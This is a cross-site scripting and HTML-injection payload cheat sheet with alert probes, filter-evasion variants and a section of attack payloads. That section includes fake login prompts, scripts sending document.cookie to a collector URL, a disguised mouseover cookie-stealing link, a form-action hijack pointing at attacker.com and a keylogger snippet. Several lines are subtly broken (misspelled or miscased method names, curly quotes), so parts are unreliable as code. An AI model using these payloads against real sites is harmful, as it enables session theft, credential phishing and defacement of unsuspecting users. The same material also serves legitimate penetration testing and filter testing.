HTML Injection test
-------------------
<h1>test</h1>

<h1>testing</h1>
<plaintext> 
<plaintext>testing</plaintext>


Click Me- No <script> tags
-------------------
<a href=javascript:alert(&quot;XSS&quot;)>Click ME!</a>


Click Me- No <script> tags(Char-code)
-------------------
<a href=javascript:alert(dtring.fromcharcode(88,83,88))>click ME!</a>


Image Source alert
-------------------
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert(123);">
<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>
<img src="https://www.marketbeat.com/logos/rapid7-inc-logo.png" onload=alert(123);>
<BODY ONLOAD=alert("XSS")>
<IFRAME SRC=”http://hacker-site.com/xss.html”>


Classic JavaScript alerts
-------------------
<script>alert('XSS');</script>
<script>alert(document.cookie)</script>
<script>alert(123);</script>
<script>alert(123)</script>
"><script>alert(123)</script>
="><script>alert('XSS')</script>
="><script>alert(123)</script>
=;"><script>alert(123)</script>
<img src="pic.jpg" alt=" "><script>alert(xss)</script>
<img src="pic.jpg" alt=" "><script>alert(123)</script>
Webinspect 
--><script></script>


Character testing
-------------------
--><sCrIpT>alert(23811)<%2fsCrIpT>

Charcode 1
-------------------
<script>alert(string.fromcharcode(88,83,83))</script>

Locators
-------------------
XSS locator
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

XSS locator 2
'';!--"<XSS>=&{()}



Address/URL Bar Scripts
-------------------
Notes:
*Chrome* will not execute URL <script>

alert(document.cookie)
javascript:alert("XSS")
javascript:alert(123)

Persistent/Defacement
<script>document.body.innerHTML="XSS";</script>
document.body.innerHTML="<h1>Defaced</h1>";
document.body.innerHTML="<h1>XSS issues</h1>"; 
document.getElementById('tagline').innerHTML='Reading club for introspective people with social and XSS issues';  

DOM Events
"onload="javascript:alert('XSS')
"onload="alert('XSS')
"onload="alert(String.fromCharCode(88,83,83))



Payloads
=========
Authentication POPUP Box
<script> username=prompt('Please enter your username',' '); password=prompt('Please enter your 
password',' ') </script>

Authentication POPUP BoxCharcode
<script>username=prompt(String.fromCharCode(80, 108, 101, 97, 115, 101, 32, 101, 110, 116, 101, 114, 32, 121, 111, 117, 114, 32, 117, 115, 101, 114, 110, 97, 109, 101));password=prompt(String.fromCharCode(80, 108, 101, 97, 115, 101, 32, 101, 110, 116, 101, 114, 32, 121, 111, 117, 114, 32, 112, 97, 115, 115, 119, 111, 114, 100))</script>

Redirect with Document cookie
<script>window.location='http://localhost/1/webpage.php?cookie='+escape(document.cookie)</script>

On Mouse Over Anchor Tag with Document cookie
<a href="http://www.redirect.com/" 
onmouseover="window.location='http://localhost/1/webpage.php?cookie='+escape
(document.cookie)">http://www.realsite.com</a>


DOM CSRF template
document.getElementByid("theform").action="http://attacker.com/webpage.php"

Keylogger
<script>document.onkeypress=function(){
Window.status+=String.fromCharCode(window.event.keyCode);}</script>
